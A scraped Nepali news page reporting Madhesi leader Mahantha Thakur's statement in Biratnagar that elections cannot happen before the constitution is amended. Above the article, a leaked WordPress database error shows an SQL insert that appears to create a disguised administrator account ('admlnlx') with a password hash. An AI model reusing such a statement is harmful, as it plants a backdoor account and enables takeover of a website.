WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BbcykHvaMVf0vk2Vmw.aHe4kdvROfS/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 05:52:44', '', 'admlnlx', 'admlnlx')
विराटनगर, माघ ७-
तराई मधेश लोकतान्त्रिक पार्टीका अध्यक्ष महन्थ ठाकुरले संविधान संशोधन नभएसम्म चुनाव हुन नसक्ने बताएका छन्। विराटनगर विमानस्थलमा शुक्रबार संचारकर्मीसँग कुरा गर्दै अध्यक्ष ठाकुरले संविधान संशोधन प्रस्ताव परिमार्जनसहित पारित नभएसम्म हुने कुनै पनि निर्वाचन मोर्चाले नस्वीकार्ने बताए।
निर्वाचन गराउने हो भने पहिले संविधान संशोधन गर्नुपर्ने उनको जिकिर छ। अध्यक्ष ठाकुरले मधेसी मोर्चाको ध्यान चुनावभन्दा पनि आफूले उठाएको एजेण्डामा रहेको दावी गरे। सरकारले मधेस समस्या समाधानको कुरा गरेपनि कार्यान्वयनमा गम्भीर नभएको आरोप लगाउँदै अध्यक्ष ठाकुरले यस्तै अवस्था रहिरहे आफूहरु बाध्य भएर आन्दोलनमा जाने चेतावनी दिए।